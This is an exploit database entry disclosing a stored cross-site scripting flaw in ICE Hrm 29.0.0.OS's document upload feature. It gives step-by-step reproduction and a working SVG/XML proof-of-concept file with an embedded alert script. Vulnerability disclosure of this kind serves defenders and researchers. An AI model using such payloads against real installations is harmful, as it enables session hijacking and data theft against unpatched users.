ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)

vendor:

ICE Hrm

by:

Piyush Patil & Rafal Lykowski

7,5

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: ICE Hrm

Affected Version From: 29.0.0.OS

Affected Version To: 29.0.0.OS

Patch Exists: NO

Related CWE: N/A

CPE: a:icehrm:ice_hrm:29.0.0.os

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 10 and Kali

2020

ICE Hrm 29.0.0.OS – ‘xml upload’ Stored Cross-Site Scripting (XSS)

The file upload feature in ICE Hrm Version 29.0.0.OS allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)
# Exploit Author: *Piyush Patil *& Rafal Lykowski
# Vendor Homepage: https://icehrm.com/
# Version: 29.0.0.OS
# Tested on: Windows 10 and Kali

#Description
The file upload feature in ICE Hrm Version 29.0.0.OS allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability.

#Steps to Reproduce the issue:
1- Login to ICE Hrm Admin Panel
2- Click on Employees=>Document Management=> Upload a below xml file

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100"
style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

3- Visit the upload location of file and XSS will get triggered.

#Video POC:
https://drive.google.com/file/d/1SnMsIhOJKBq4Pnotgm0nw1Pz7TypPsoQ/view?usp=sharing